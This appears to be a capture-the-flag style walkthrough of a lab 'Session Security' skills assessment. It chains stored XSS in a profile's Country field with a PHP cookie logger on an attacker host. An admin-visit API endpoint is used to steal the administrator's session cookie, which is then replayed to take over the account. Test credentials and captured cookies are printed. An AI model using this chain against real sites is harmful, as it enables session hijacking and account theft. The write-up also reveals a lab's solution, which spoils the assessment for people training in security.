Session Security

Skills Assessment

Test account credentials:

  • Email: heavycat106

  • Password: rocknrol

Create a log.php script on the attacking host that records the cookie sent by any browser that loads the public profile page (the cookie arrives in a query parameter of the request the injected payload makes).

Inject XSS test payloads into the different profile input fields (country, name, phone) and see which one renders unescaped on the public profile.

The Country input field is vulnerable to XSS injection.

Click Save, then Share, and check the listener for the request made by your own browser.

Captured user cookie: s%3Azgj5CVxjAQfFn87UYr_TMS71EcFqp4rO.KtaGjIBaYnO8yi6zU79xydo665QMnxqIW629bLzoBF0

Now we can use the API endpoint to make the Administrator visit the public profile URL: http://minilab.htb.net/profile?email=julie.rogers@example.com

/submit-solution is the API endpoint described at the start of the assessment.

http://minilab.htb.net/submit-solution

To make the admin visit the profile, pass the public profile URL of Julie Rogers as the url parameter of the API endpoint, with a PHP server serving log.php on port 8000. The nested URL is shown unencoded below; if the target mangles the inner query string, URL-encode the inner URL (at least the ? and = characters) before submitting.

https://minilab.htb.net/submit-solution?url=http://minilab.htb.net/profile?email=julie.rogers@example.com

Start the listener from the directory that contains log.php:

php -S 10.10.14.99:8000

Request received by the listener when the admin's browser rendered the profile:

GET /log.php?c=auth-session=s%3ADVBJKWUHWFsbsK_awzzui_EXuEyaQkUe.hLIQRFaEQFekQZoq2le6Wa%2Bd6fRVh%2FVxMRr%2B6iqFRa8

Admin session cookie (URL-decoded): s:DVBJKWUHWFsbsK_awzzui_EXuEyaQkUe.hLIQRFaEQFekQZoq2le6Wa+d6fRVh/VxMRr+6iqFRa8

URL-decode the captured value, then replace the auth-session cookie of the current session with it in the browser developer tools (Application > Cookies) and reload to take over the administrator's session. Keep the whole value, including the part after the dot: the suffix is a signature over the session id, and a cookie with only the id will be rejected.
